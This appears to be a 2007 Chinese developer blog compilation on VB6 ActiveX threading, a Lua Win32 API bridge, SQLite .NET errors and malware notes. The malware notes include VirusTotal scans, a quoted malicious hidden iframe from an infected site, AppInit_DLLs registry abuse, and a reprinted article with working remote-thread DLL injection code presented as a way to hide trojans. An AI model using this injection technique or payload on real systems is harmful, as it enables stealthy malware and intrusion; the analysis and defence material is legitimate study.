就是OCX或DLL文件没有注册.你找出来用regsvr32注册一下

Generate .NET Web applications in minutes straight from your database. Quickly create visually stunning, feature-rich Web applications that are easy-to-customize and ready-to-deploy. If you need an app built today, use Iron Speed Designer!
Simply point to an existing database and let the Iron Speed Designer wizards build a sophisticated, database-driven application that\’s ready to deploy. In just minutes, Iron Speed Designer generates your application\’s Web pages, user interface code and data access logic. Say \’Good bye\’ to hand-coding ASPX pages and SQL statements.

http://support.microsoft.com/kb/241896/zh-tw
Visual Basic 6.0 ActiveX 元件的執行緒問題

VB写一个ActiveX   DLL然后在VB主程序中引用此ActiveX   DLL，主程序编译成   EXE   运行正常。而当我再次修改此ActiveX   DLL重新编译和注册，主程序.EXE出错提示“运行时错误‘430’   ，类不支持自动化或不支持期望的接口”。难道非要我再次在主程序源代码中引用该修改后的ActiveX   DLL并重新编译成EXE才能正常运行吗
如果你的程序（EXE）里边用这种方式引用的话就没这个问题了 
  dim   DLLObj   as   Object 
  set   DLLObj=CreateObject("DLL工程名.类名") 
  
  你现在这个情况，只有用二进制兼容的方式重新编译DLL，再在EXE里边重新引用、重新编译才行了。这样搞过以后，下次再改DLL，只要不动函数接口，就不需要再编译EXE了

如何在VB6里面实现稳定的多线程—–受人启发而写 

http://liye9801.blog.163.com/blog/static/60197032006826113633291/
在VB中异步执行程序

VB的doevents，制造多线程的效果

VB中实现多线程只能用ActiveX EXE。
不要用CreateThread和AddressOf，除非你开的线程中不访问
Form和TextBox及其他任何控件，否则程序必Crash无疑。这跟
VB的机制有关，VB中的任何控件包括Form等都是基于COM的，
任何线程要访问COM Object，都必须先用CoInitialize初始化，
然后才能进入包含COM Object的Apartment中对COM Oject的属
性和方法进行访问。当然你也可以在你的线程中把CoInitialize
写进去，它是一个api，在ole32.dll中，但接下来你怎么办？你
还需要对interface中方法marshal出来才能用，除非你对COM的机
理很熟，否则这些工作对你来说负担太重了，也违背了VB这种开发
工具的本意。VB7据说可以用new thread来产生一个新线程，我想它
无非是把上面这部分工作给hide起来了，原理上应该不会有太多的
出入。
ActiveX EXE能实现多线程，是因为它的property中有个Thread Model
设置，你可以把它设为thread per object，这项设置意味着你可以在
工程中CreateObject或new一个基于新线程的对象。如果你的新线程中
含有GUI或msgbox等东西，可能还需要一些特别的技巧和设置，当然也
是能做的。 

http://www.gsrtvu.cn/dxdkt/wlkc/jszx/vbkj/jjjc/ch10/10.3.htm
Activex EXE 组件编程

已经搞好一个多串口通信完成我公司变频器的通信的工程，已经投入使用，并运行正常，但是有个问题我现在还是无法搞懂。 
  刚开始的时候，我写这个activeX   EXE工程的时候，在工程属性中，有一项为“线程模块”，一定要选择“每个对象对应一个线程”才能够正常运行程序，而如果默认选择的“使用线程池（1线程）”这样的话运行一段时间以后，这个后台的activeX   EXE工程会失去响应导致客户端也会出现自动化错误而退出或死掉。 

  http://www.pcdog.com/edu/vb/2005/12/l056079.html
  怎样用vb写多线程

  vb实现多线程！
  http://www.ttadd.com/diannao/HTML/26921_7.html

  http://www.7880.com/Info/Article-4d97e440.html
  在Vb下实现多线程

  http://www.moon-soft.com/doc/readelite6461.htm
  VB中多线程的实现

  vb实现多线程
  http://www.newasp.net/tech/program/21402.html

标签：dll, vb, 多线程, 线程

20070723 lua 扩展 DLL win32 api 1
http://www.yippeesoft.com

lua 扩充
标准WIN32 DLL，DLL名和代码定义要一致

http://blog.codingnow.com/cloud/LuaApiCall

但是最后会异常

[quote]

#include "lua.h"
#include <malloc.h>
#include <windows.h>
 
typedef void* (__stdcall *func_call)();
 
static int api_call(lua_State *L)
&leftsign;
 int i,type;
 int n=lua_gettop(L);
 func_call fc=(func_call)lua_touserdata(L,lua_upvalueindex(2));
 void *ret;
 do &leftsign;
  void **arg=(void **)_alloca(n*sizeof(void *));
  for (i=0;i<n;i++) &leftsign;
   type=lua_type(L,i+1);
   switch(type) &leftsign;
    case LUA_TNIL:
     arg[i]=0;
     break;
    case LUA_TNUMBER:
     arg[i]=(void*)lua_tointeger(L,i+1);
     break;
    case LUA_TBOOLEAN:
     arg[i]=(void*)lua_toboolean(L,i+1);
     break;
    case LUA_TSTRING:
     arg[i]=(void *)lua_tostring(L,i+1);
     break;
    case LUA_TLIGHTUSERDATA:
     arg[i]=lua_touserdata(L,i+1);
     break;
    default:
     lua_pushstring(L,"unknown argument type");
     lua_error(L);
     break;
   &rightsign;
  &rightsign;
  ret=fc();
 &rightsign; while(0);
 switch(lua_type(L,lua_upvalueindex(1))) &leftsign;
 case LUA_TNIL:
  lua_pushlightuserdata(L,ret);
  break;
 case LUA_TNUMBER:
  lua_pushinteger(L,(int)ret);
  break;
 case LUA_TBOOLEAN:
  lua_pushboolean(L,(int)ret);
  break;
 case LUA_TSTRING:
  lua_pushstring(L,(const char*)ret);
  break;
 default:
  lua_pushstring(L,"unknown return value type");
  lua_error(L);
  break;
 &rightsign;
 return 1;
&rightsign;
 
static int open_dll(lua_State *L)
&leftsign;
 const char *name=lua_tostring(L,1);
 HMODULE hm=LoadLibrary(name);
 lua_pushlightuserdata(L,hm);
 return 1;
&rightsign;
 
static int get_procaddress(lua_State *L)
&leftsign;
 HMODULE hm=(HMODULE)lua_touserdata(L,1);
 const char *name=lua_tostring(L,2);
 void *func=GetProcAddress(hm,name);
 lua_pushvalue(L,3);
 lua_pushlightuserdata(L,func);
 lua_pushcclosure(L,api_call,2);
 return 1;
&rightsign;
 
__declspec(dllexport) int luaopen_api_procaddress(lua_State *L)
&leftsign;
 lua_pushcfunction(L,get_procaddress);
 return 1;
&rightsign;
 
__declspec(dllexport) int luaopen_api_opendll(lua_State *L)
&leftsign;
 lua_pushcfunction(L,open_dll);
 return 1;
&rightsign;

下面，我们可以在 lua 中调用 windows 的 api 了，用法大约是这样的：

opendll = require("api.opendll")
getprocaddress =require("api.procaddress")
user32=opendll("user32.dll")
MessageBox=getprocaddress(user32,"MessageBoxA")
MessageBox(nil,"hello","hehe",0)

[/quote]

20070607 System.Data.SQLite.DLL cf2.0 cs0009
http://www.yippeesoft.com

Microsoft.Common.targets : warning MSB3247: 同一依赖程序集的不同版本之间出现冲突。
CSC : fatal error CS0009: 未能打开元数据文件“ \\SQLite.NET\\bin\\CompactFramework\\System.Data.SQLite.DLL”–“版本 2.0 不是兼容版本。”

Visual C# Reference: Errors and Warnings
Compiler Error CS0009

Error Message
Metadata file \’file\’ could not be opened — \’description\’

The file specified with the /reference compiler option does not contain valid metadata.

1、vs2005访问sqlite数据库需要使用ADO.NET 2.0 SQLite Data Provider控件，大家可以从http://sqlite.phxsoftware.com/ 下载最新的版本。下载后执行安装程序，默认安装到C:\\Program Files\\SQLite.NET目录中。
2、进入C:\\Program Files\\SQLite.NET\\bin目录，可以找到一个System.Data.SQLite.DLL文件。稍后将此文件拷贝到vs2005项目中的bin目录。
3、打开vs2005并新建一个C#语言的web项目，在代码页开头添加引用：using System.Data.SQLite;（或许你还需要在项目名那点右键然后“添加引用”该dll文件）
4、数据库的连接语句格式为：strConn = @"Data Source=xxx.dat"; // xxx.dat为你所新建的数据库文件。连接成功后即可像访问其它SQL数据库一样对其进行操作。
连接例子如下：
using System.Data.SQLite;
….
string strConn = @"Data Source=d:\\myweb\\test.dat" ;
SQLiteConnection myCon = new SQLiteConnection(strConn);
SQLiteDataAdapter myAda = new SQLiteDataAdapter("select * from test", myCon);
DataSet mySet = new DataSet();
myAda.Fill(mySet, "表名");

CF 2.0 中sqlite开发问题

同样的一段代码，比如：
SQLiteConnection dbConn = new SQLiteConnection("Data Source = sample.db3");
SQLiteCommand dbCommand = new SQLiteCommand("Select * from [COUNTRY] ", dbConn);
dbConn.Open();
SQLiteDataReader dbReader = dbCommand.ExecuteReader();
在Windows窗体开发中，没有任何问题；但在mobile 5中开发，出现错误：sqlite error:not such table country，百思不得其解，恳请赐教！

初步找到原因和解决方法了：

1、我的环境：SQLite ADO.NET 2.0 驱动程序用的是System.Data.SQLite.DLL(1.0.33.0)，在VisualStudio2005上调试WindowMobile5.0

2、执行select语句，出现no such table的错误，原来我的数据库是用SQLite Database Browser 1.2.1和1.3创建的，我改用代码里动态创建表、插入、查询，一点问题都没有。复制出创建的数据库到PC，再用SQLite Database Browser 1.3打开，可以看到创建的表和记录，然后我新建另外一个表，保存复制到手机，添加代码查询新表，PC上编译再复制到手机，手机上运行程序，又出现no such table的错误——看来，罪魁祸首就是SQLite Database Browser了，晕！

3、解决方法：自个代码里建表，可以用SQLite Database Browser 1.3 PC上添加纪录，但不能建表。

Fatal error CS0009: Metadata file XXX.DLL could not be opened…

Problem

You receive this error when compiling your application:

Fatal error CS0009: Metadata file ‘XXX.dll\’ could not be opened — \’There isn\’t metadata in the memory or stream\’

This problem occurs when you have added a third-party DLL to your application and have not properly added it to your compiler’s project file or references list.
Solution

Open your project in Visual Studio .NET.  Make sure the DLL exists and has been properly added to the reference list.  If you are using VBC or CSC to compile your project, check your application’s CompileApplication.rsp file to make sure the DLL is in the /references list like the other DLL’s.

Your DLL may not be compatible with .NET or with .NET’s 32-bit mode.  Ensure that your DLL is .NET compatible.

If your project still won’t compile properly, try switching your application’s compiler selection in Iron Speed Designer’s Application Wizard from \’vbc.exe\’  or ‘csc.exe’ to Visual Studio .NET or vice versa.  Using Visual Studio .NET will take longer to build than .NET’s VBC or CSC built-in compilers, but Visual Studio .NET will resolve all of the references properly without having to change your application’s CompileApplication.rsp file.
See Also

System.Data.SQLite is an enhanced version of the original SQLite database engine.  It is a complete drop-in replacement for the original sqlite3.dll (you can even rename it to sqlite3.dll).  It has no linker dependency on the .NET runtime so it can be distributed independently of .NET, yet embedded in the binary is a complete ADO.NET 2.0 provider for full managed development.

20070414 dlmon4.dll syswav.sys virustotal rootkit
http://www.yippeesoft.com

AntiVir    7.3.0.32    01.27.2007    no virus found
Authentium    4.93.8    01.26.2007    no virus found
Avast    4.7.936.0    01.27.2007    no virus found
AVG    386    01.26.2007    no virus found
BitDefender    7.2    01.27.2007    no virus found
CAT-QuickHeal    9.00    01.26.2007    no virus found
ClamAV    devel-20060426    01.26.2007    no virus found
DrWeb    4.33    01.26.2007    no virus found
eSafe    7.0.14.0    01.26.2007    no virus found
eTrust-InoculateIT    23.73.126    01.27.2007    no virus found
eTrust-Vet    30.3.3353    01.27.2007    no virus found
Ewido    4.0    01.26.2007    no virus found
Fortinet    2.85.0.0    01.27.2007    no virus found
F-Prot    4.2.1.29    01.26.2007    no virus found
Ikarus    T3.1.0.27    01.26.2007    no virus found
Kaspersky    4.0.2.24    01.27.2007    no virus found
McAfee    4950    01.26.2007    no virus found
Microsoft    1.2101    01.27.2007    TrojanDropper:Win32/Small.BLE
NOD32v2    2010    01.26.2007    no virus found
Norman    5.80.02    01.26.2007    no virus found
Panda    9.0.0.4    01.26.2007    Suspicious file
Prevx1    V2    01.27.2007    no virus found
Sophos    4.13.0    01.24.2007    no virus found
Sunbelt    2.2.907.0    01.26.2007    no virus found
TheHacker    6.0.3.158    01.26.2007    no virus found
UNA    1.83    01.26.2007    no virus found
VBA32    3.11.2    01.27.2007    no virus found
VirusBuster    4.3.19:9    01.26.2007    no virus found

Antivirus    Version    Update    Result
AntiVir    7.3.0.32    01.27.2007    no virus found
Authentium    4.93.8    01.26.2007    no virus found
Avast    4.7.936.0    01.27.2007    no virus found
AVG    386    01.26.2007    no virus found
BitDefender    7.2    01.27.2007    no virus found
CAT-QuickHeal    9.00    01.26.2007    no virus found
ClamAV    devel-20060426    01.26.2007    no virus found
DrWeb    4.33    01.26.2007    no virus found
eSafe    7.0.14.0    01.26.2007    no virus found
eTrust-InoculateIT    23.73.126    01.27.2007    no virus found
eTrust-Vet    30.3.3353    01.27.2007    no virus found
Ewido    4.0    01.26.2007    no virus found
Fortinet    2.85.0.0    01.27.2007    no virus found
F-Prot    4.2.1.29    01.26.2007    no virus found
Ikarus    T3.1.0.27    01.26.2007    no virus found
Kaspersky    4.0.2.24    01.27.2007    no virus found
McAfee    4950    01.26.2007    no virus found
Microsoft    1.2101    01.27.2007    Trojan:Win32/Killav.ET
NOD32v2    2010    01.26.2007    probably unknown NewHeur_PE virus
Norman    5.80.02    01.26.2007    no virus found
Panda    9.0.0.4    01.26.2007    no virus found
Prevx1    V2    01.27.2007    no virus found
Sophos    4.13.0    01.24.2007    no virus found
Sunbelt    2.2.907.0    01.26.2007    no virus found
TheHacker    6.0.3.158    01.26.2007    no virus found
UNA    1.83    01.26.2007    no virus found
VBA32    3.11.2    01.27.2007    no virus found
VirusBuster    4.3.19:9    01.26.2007    no virus found

自卫能力:第一步
首先阻止rootkit从这些地方加载:
禁止访问\\Device\\PhysicalMemory
禁止驱动加载系统调用
局限:
攻击者可以通过新的核心权限泄露漏洞绕过
用某种机敏的方式通过符号连接(symbolic
link)访问\\Device\\PhysicalMemory
38
自卫能力:第二步
防止rootkit固定
禁止任何试图创建
HKLM\\SYSTEM\\CurrentControlSet\\*\\Type
为类型0或者类型1(改变为4为禁止)
禁止任何试图修改存在的
HKLM\\SYSTEM\\CurrentControlSet\\*\\Type
局限:
Rootkit可能直接patch hal.dll,ntoskrnl.exe
等
通过符号连接用某种机敏的办法访问注册表
39
自卫能力:第三步
确信没有其他的驱动在之前加载,除了
FAT/NTFS
在"Boot Bus Extender"最开始安装我们自己
阻止任何改变
HKLM\\SYTSEM\\CurrentControlSet\\Group
OrderList
40
自卫能力:第四步
确信没有人能改变对象类型callback
让一个无限循环线程比如类似每100毫秒就检查
被hook的callback
恢复callback如果在被改变的时候并且报告一个
攻击
找出callback指向哪里(让我们知道谁做的)
如果它不是一个已知的系统驱动,就卸载它
41
总结
以上描述的是一种观察系统行为的方法
用户模式和核心态
这种方法可以阻截某些行为
特征语言可以用来检测已知的rootkits
应该具备自保护能力
对于还没有验证的新rootkits是必须的
最后,这只是猫和老鼠游戏的一步而已

20070409 cn3721 org 木马 AppInit_DLLs
http://www.yippeesoft.com

[quote]
 案例一：
             单位的公用上网机器，PIII 800M，XPSP2，未打MS最近的67个补丁。原来用的瑞星，木马和病毒泛滥。后来我在上面用nod32和ewido使劲杀了一阵子，恢复到正常状态，用冰刃未发现不良的进程和内核模块。两天后，nod32频繁报警，称IEXPLORE.EXE频繁通过80端口访问ads.cn3721.com，下载文件b1.exe、b2.exe、……、log[1].exe等木马并尝试运行(其中有魔兽世界、QQ的盗号木马)，并将其存放在\\Documents and Settings\\%username%\\LocalSettings\\Temp下和\\%username%\\Local Settings\\Temporary Internet
Files\\Content.IE5中的子目录下。IE进程可以在资源管理器中发现，但并没有窗口程序。nod32只能阻止连接，并不能关闭相关进程，甚至连下载的病毒都无法隔离。用冰刃发现，是系统的explorer.exe进程中的某个线程创建的IE。如果硬性关闭IE，则木马会定时自检，再继续调用IE。在冰刃的内核模块中，发现??%windir%\\TEMP\\MC21.TMP,在HKLM\\SYSTEM\\CurrentControlSet\\Services\\mchInjDrv\\ImagePath 有键值：%windir%\\TEMP\\MC21.TMP，但在TEMP文件夹下用冰刃根本找不到MC21.TMP。木马还加入启动项好像叫什么SOUNDM，搞得跟声卡驱动似的，但执行文件是恶意的%windir%\\winsmd.exe。删掉winsmd.exe和注册表项mchInjDrv后，我通过虚拟软驱进入系统，把\\Local Settings下的文件夹和%windir%下的\\system32、\\Downloaded Program Files都找了个遍，有相关关键字的文件基本都删了。进入系统，还是有内核模块运行，还是继续下载病毒。我又关闭了不少系统服务，甚至连非PNP的设备驱动都关的关删的删，还是无法解决问题。尤其是系统服务，并未发现有除了杀毒软件和防火墙之外的非系统服务，连改名蒙混的都没有。其间，我上网找了很多相关资料，基本确定是灰鸽子变种，但网上的所有手工杀法都不顶事，只有“灰鸽子vip0105破解版测试报告”倒是有些靠谱的地方，但还是没有解决方案。冰刃都没有用，hijackthis更是毫无作为。最后，重装了XP系统。
         这个案例真是太失败了。

[/quote]
我现在ICESWORDS都不能运行
[quote]
发现了一段可能是恶意代码:
QUOTE:

<iframe src="http://web .cn3721 .org/web.htm" height=0 width=0></iframe>
<script language="javascript">
<!–
var expires = new Date();
expires.setTime(expires.getTime() + 5 * 24* 60 * 60 * 1000);
document.cookie="GAG5=12345fuck;expires="+expires.toGMTString();
–>
</script>
[/quote]

[quote]
我网站也中了，但是我的网站是电信的空间，检查WEB文件并没有变化，应该是IIS被入侵了，可能是ISAPI。这个木马使用了COOKIES，如果你屏蔽COOKIES的话每个网页最后都会出现上面的恶意代码，不然的话记录了COOKES的IE就不会再出现这些代码了。但是因为我没法直接管理电信的 IIS，只有找他们去解决了。
[/quote]

顺便发现494000.BMP木马
[quote]
在以下注册表项中找到 AppInit_DLLs 值：

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows
默认值为空!卡巴斯基可能更改此值!

一种木马可能用到的方法!
注册表的系统设置项“AppInit_DLLs”可以为任一个进程调用一个dll列表,早期的进程插入式木马的伎俩，通过修改注册表中的 [HKEY_LOCAL_MACHINE\\Software\\Microsoft\\WindowsNT\\CurrentVersion\\Windows\\AppInit_DLLs] 来达到插入进程的目的。缺点是不实时，修改注册表后需要重新启动才能完成进程插入。如求职信病毒。利用注册表启动，就是让系统执行DllMain来达到启动木马的目的。因为它是kernel调入的，对这个DLL的稳定性有很大要求，稍有错误就会导致系统崩溃，所以很少看到这种木马。

最近发现此值被改为273100M.BMP的情况!而且在正常模式下无法删除!
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows]
"AppInit_DLLs"="273100M.BMP"
[/quote]

[quote]
概要
在以下注册表项中找到 AppInit_DLLs 值：

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows

该值中指定所有 DLL 加载由每个 Microsoft 当前日志中运行会话上基于 Windows 的应用程序。
更多信息
注意 此功能不可能将来版本的 Windows 操作系统中可用。

通过在 User 32 .dll 的 DLL_PROCESS_ATTACH 过程使用 LoadLibrary() 函数加载 AppInit DLL。 因此, 可执行文件， 没有与 User 32 链接不加载 AppInit DLL。 有很少， 没有链接与 User 32 可执行文件。

因其早期加载, 导出从 Kernel 只 API 函数是安全地使用对 AppInit DLL 初始化中。

建议不要应用程序使用此功能或依赖于此功能。 还有其他技术可用于获得相似结果。 有关其他信息, 请单击下列文章编号以查看 Microsoft 知识库中相应：
134655 (http://support.microsoft.com/kb/134655/) AppInit_DLLs 注册表值和 Windows 95
AppInit_DLLs 值具有类型 " REG _ SZ "。 该值必须为指定 – 空终止字符串的 DLL， 由空格或逗号分隔。 由于使用空格作为分隔符, 不使用长文件名 对于这些 DLL 系统无法识别分号作为分隔符。

通常, 只有 Administrators 组和 LocalSystem 帐户具有写访问权键包含 AppInit_DLLs 值。
[/quote]

20070125 Comodo Firewall pcaudit 2 DLL injection

www.yippeesoft.com

最近木马都喜欢DLL注入，然后用程序访问外面的，想看看哪个防火墙可以
天网不行，只会问你哪个要访问
MCAFEE开启应用程序拦截会问程序是不是允许 感觉非常麻烦
不过记得以前用过一个可以提示应用程序的哪个DLL访问网络，可是好像找不到了

最后用了 comodo firewall 感觉可以监控到DLL，先用着看看

在WIN9X中，只需要将进程注册为系统服务就能够从进程查看器中隐形，可是这一切在WINNT中却完全不同， 无论木马从端口、启动文件上如何巧妙地隐藏自己，始终都不能欺骗WINNT的任务管理器，难道在WINNT下木马真的再也无法隐藏自己的进程了？

　　我们知道，在WINDOWS系统下，可执行文件主要是Exe和Com文件，这两种文件在运行时都有一个共同点，会生成一个独立的进程，寻找特定进程是我们发现木马的方法之一（无论手动还是防火墙），随着入侵检测软件的不断发展，关联进程和SOCKET已经成为流行的技术（例如著名的FPort就能够检测出任何进程打开的TCP/UDP端口），假设一个木马在运行时被检测软件同时查出端口和进程，我们基本上认为这个木马的隐藏已经完全失败（利用心理因素而非技术手段欺骗用户的木马不在我们的讨论范围之内）。在NT下正常情况用户进程对于系统管理员来说都是可见的，要想做到木马的进程隐藏，有两个办法，第一是让系统管理员看不见（或者视而不见）你的进程；第二是不使用进程。

　　让系统管理员看不见进程的方法就是进行进程列表欺骗，为了了解如何看不见进程，我们首先要了解怎样能看得见进程：在Windows中有多种方法能够看到进程的存在：PSAPI（Process Status API），PDH（Performance Data Helper），ToolHelp API，如果我们能够欺骗用户和入侵检测软件用来查看进程的函数（例如截获相应的API调用，替换返回的数据），我们就完全能实现进程隐藏，但是一来我们并不知道用户和入侵软件使用的是什么方法来查看进程列表，二来如果我们有权限和技术实现这样的欺骗，我们就一定能使用其它的方法更容易的实现进程的隐藏。（例如：能够替换DLL或挂接API来隐藏进程不如直接用来做木马。）

　　第二种方法是不使用进程，不使用进程使用什么？为了弄明白这个问题，我们必须要先了解Windows系统的另一种“可执行文件”—-DLL，DLL是Dynamic Link Library（动态链接库）的缩写，DLL文件是Windows的基础，因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑，是由多个功能函数构成，它并不能独立运行，一般都是由进程加载并调用的。（你你你，你刚刚不是说不用进程了？）别急呀，听我慢慢道来：因为DLL文件不能独立运行，所以在进程列表中并不会出现DLL，假设我们编写了一个木马DLL，并且通过别的进程来运行它，那么无论是入侵检测软件还是进程列表中，都只会出现那个进程而并不会出现木马DLL，如果那个进程是可信进程，（例如资源管理器Explorer.exe，没人会怀疑它是木马吧？）那么我们编写的DLL作为那个进程的一部分，也将成为被信赖的一员而为所欲为。

　　运行DLL文件最简单的方法是利用Rundll32.exe，Rundll/Rundll32是Windows自带的动态链接库工具，可以用来在命令行下执行动态链接库中的某个函数，其中Rundll是16位而Rundll32是32位的（分别调用16位和32位的DLL文件），Rundll32的使用方法如下：

　　Rundll32 DllFileName FuncName

　　例如我们编写了一个MyDll.dll，这个动态链接库中定义了一个MyFunc的函数，那么，我们通过Rundll32.exe  MyDll.dll  MyFunc就可以执行MyFunc函数的功能。

　　这个和木马的进程隐藏有什么关系么？当然有了，假设我们在MyFunc函数中实现了木马的功能，那么我们不就可以通过Rundll32来运行这个木马了么？在系统管理员看来，进程列表中增加的是Rundll32.exe而并不是木马文件，这样也算是木马的一种简易欺骗和自我保护方法（至少你不能去把Rundll32.exe删掉吧？想从Rundll32进程找到DLL木马还是有一点麻烦的）

　　使用Rundll32的方法进行进程隐藏是简易的，非常容易被识破。（虽然杀起来会麻烦一点）比较高级的方法是使用特洛伊DLL，特洛伊DLL的工作原理是使用木马DLL替换常用的DLL文件，通过函数转发器将正常的调用转发给原DLL，截获并处理特定的消息。例如，我们知道WINDOWS的Socket1.x的函数都是存放在wsock32.dll中的，那么我们自己写一个wsock32.dll文件，替换掉原先的wsock32.dll（将原先的DLL文件重命名为wsockold.dll）我们的wsock32.dll只做两件事，一是如果遇到不认识的调用，就直接转发给wsockold.dll（使用函数转发器forward）；二是遇到特殊的请求（事先约定的）就解码并处理。这样理论上只要木马编写者通过SOCKET远程输入一定的暗号，就可以控制wsock32.dll（木马DLL）做任何操作。特洛伊DLL技术是比较古老的技术，因此微软也对此做了相当的防范，在Win2K的system32目录下有一个dllcache的目录，这个目录中存放着大量的DLL文件（也包括一些重要的exe文件），这个是微软用来保护DLL的法宝，一旦操作系统发现被保护的DLL文件被篡改（数字签名技术），它就会自动从dllcache中恢复这个文件。虽然说有种种方法可以绕过DLL保护（例如先更改dllcache目录中的备份再修改DLL文件、或者利用KnownDLLs键值更改DLL的默认启动路径等），但是可以想见的未来微软必将更加小心地保护重要的DLL文件；同时由于特洛伊DLL方法本身有着一些漏洞（例如修复安装、安装补丁、升级系统、检查数字签名等方法都有可能导致特洛伊DLL失效），所以这个方法也不能算是DLL木马的最优选择。

　　DLL木马的最高境界是动态嵌入技术，动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说，在Windows中的每个进程都有自己的私有内存空间，别的进程是不允许对这个私有空间进行操作的（私人领地、请勿入内），但是实际上，我们仍然可以利用种种方法进入并操作进程的私有内存。在多种动态嵌入技术中（窗口Hook、挂接API、远程线程），我最喜欢的是远程线程技术，这种技术非常简单，只要有基本的进线程和动态链接库的知识就可以很轻松地完成嵌入，下面就为大家介绍一下远程线程技术。
远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道，在进程中，可以通过CreateThread函数创建线程，被创建的新线程与主线程（就是进程启动时被同时自动建立的那个线程）共享地址空间以及其他的资源。但是很少有人知道，通过CreateRemoteThread也同样可以在另一个进程内创建新线程，被创建的远程线程同样可以共享远程进程（是远程进程耶！）的地址空间，所以，实际上，我们通过一个远程线程，进入了远程进程的内存地址空间，也就拥有了那个远程进程相当的权限。例如在远程进程内部启动一个DLL木马（与进入进程内部相比，启动一个DLL木马是小意思，实际上我们可以随意篡改那个远程进程的数据）。

　　首先，我们通过OpenProcess 来打开我们试图嵌入的进程（如果远程进程不允许打开，那么嵌入就无法进行了，这往往是由于权限不足引起的，解决方法是通过种种途径提升本地进程的权限）

　hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD &line; //允许远程创建线程
　　　　　　　　　　　　　　　　PROCESS_VM_OPERATION &line; //允许远程VM操作
　　　　　　　　　　　　　　　　PROCESS_VM_WRITE,//允许远程VM写
　　　　　　　　　　　　　　　　FALSE, dwRemoteProcessId )

　　由于我们后面需要写入远程进程的内存地址空间并建立远程线程，所以需要申请足够的权限（PROCESS_CREATE_THREAD、VM_OPERATION、VM_WRITE）。

　　然后，我们可以建立LoadLibraryW函数这个线程来启动我们的DLL木马，LoadLibraryW函数是在kernel32.dll中定义的，用来加载DLL文件，它只有一个参数，就是DLL文件的绝对路径名pszLibFileName，（也就是木马DLL的全路径文件名），但是由于木马DLL是在远程进程内调用的，所以我们首先还需要将这个文件名复制到远程地址空间：（否则远程线程是无法读到这个参数的）

　//计算DLL路径名需要的内存空间
　int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
　//使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名缓冲区
　pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb,
　　　　　　　　　　　　MEM_COMMIT, PAGE_READWRITE);
　//使用WriteProcessMemory函数将DLL的路径名复制到远程进程的内存空间
　iReturnCode = WriteProcessMemory(hRemoteProcess,
　　　　　　　　　　　　pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);
　//计算LoadLibraryW的入口地址
　PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
　　　　　GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");

　　OK，万事俱备，我们通过建立远程线程时的地址pfnStartAddr（实际上就是LoadLibraryW的入口地址）和传递的参数pszLibFileRemote（实际上是我们复制过去的木马DLL的全路径文件名）在远程进程内启动我们的木马DLL：

　//启动远程线程LoadLibraryW，通过远程线程调用用户的DLL文件
　hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0,
　　　　　　　　　　　　　　　　　pfnStartAddr, pszLibFileRemote, 0, NULL);

　　至此，远程嵌入顺利完成，为了试验我们的DLL是不是已经正常的在远程线程运行，我编写了以下的测试DLL：

　BOOL APIENTRY DllMain(HANDLE hModule, DWORD reason, LPVOID lpReserved)
　　　&leftsign;
　　　　char szProcessId[64] ;
　　　　switch ( reason )
　　　　　&leftsign;
　　　　　　case DLL_PROCESS_ATTACH:
　　　　　　　&leftsign;
　　　　　　　　　//获取当前进程ID
　　　　　　　　　_itoa ( GetCurrentProcessId(), szProcessId, 10 );
　　　　　　　　　MessageBox ( NULL, szProcessId, "RemoteDLL", MB_OK );
　　　　　　　&rightsign;
　　　　　　default:
　　　　　　return TRUE;
　　　　　&rightsign;
　　　&rightsign;

　　当我使用RmtDll.exe程序将这个TestDLL.dll嵌入Explorer.exe进程后（PID=1208），该测试DLL弹出了1208字样的确认框，同时使用PS工具也能看到

　　　Process ID: 1208
　　　C:\\WINNT\\Explorer.exe (0×00400000)
　　　……
　　　C:\\TestDLL.dll (0×100000000)
　　　……

　　这证明TestDLL.dll已经在Explorer.exe进程内正确地运行了。

　　无论是使用特洛伊DLL还是使用远程线程，都是让木马的核心代码运行于别的进程的内存空间，这样不仅能很好地隐藏自己，也能更好的保护自己。

　　这个时候，我们可以说已经实现了一个真正意义上的木马，它不仅欺骗、进入你的计算机，甚至进入了进程的内部，从某种意义上说，这种木马已经具备了病毒的很多特性，例如隐藏和寄生（和宿主同生共死），如果有一天，出现了具备所有病毒特性的木马（不是指蠕虫，而是传统意义上的寄生病毒），我想我并不会感到奇怪，倒会疑问这一天为什么这么迟才到来。
最后，感谢西祠的Lion Hook在DLL文件操作上对我的指导，同时也感谢补天的abu、yagami、eyas、sztwww、大鹰、大皮球和其他兄弟们跟我一起讨论隐藏进程的技术，让我学到了很多的东西。

揭开木马的神秘面纱（四）-DLL木马篇　
2001-05-23· Shotgun ·yesky

20070103 g0ld.com.exe   nsSCM.dll

mssvc32.dll DDoS-Rincux
STATUS: FINISHEDComplete scanning result of "g0ld.com.exe", received in VirusTotal at 12.06.2006, 15:52:56 (CET).

Antivirus Version Update Result
AntiVir 7.2.0.49 12.06.2006  no virus found
Authentium 4.93.8 12.05.2006  no virus found
Avast 4.7.892.0 12.06.2006 Win32:Agent-CRX
AVG 386 12.06.2006  no virus found
BitDefender 7.2 12.06.2006  no virus found
CAT-QuickHeal 8.00 12.05.2006 (Suspicious) – DNAScan
ClamAV devel-20060426 12.06.2006  no virus found
DrWeb 4.33 12.06.2006 BACKDOOR.Trojan packed by BINARYRES
eSafe 7.0.14.0 12.06.2006 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.78 12.06.2006  no virus found
eTrust-Vet 30.3.3234 12.06.2006  no virus found
Ewido 4.0 12.05.2006  no virus found
Fortinet 2.82.0.0 12.06.2006 suspicious
F-Prot 3.16f 12.05.2006  no virus found
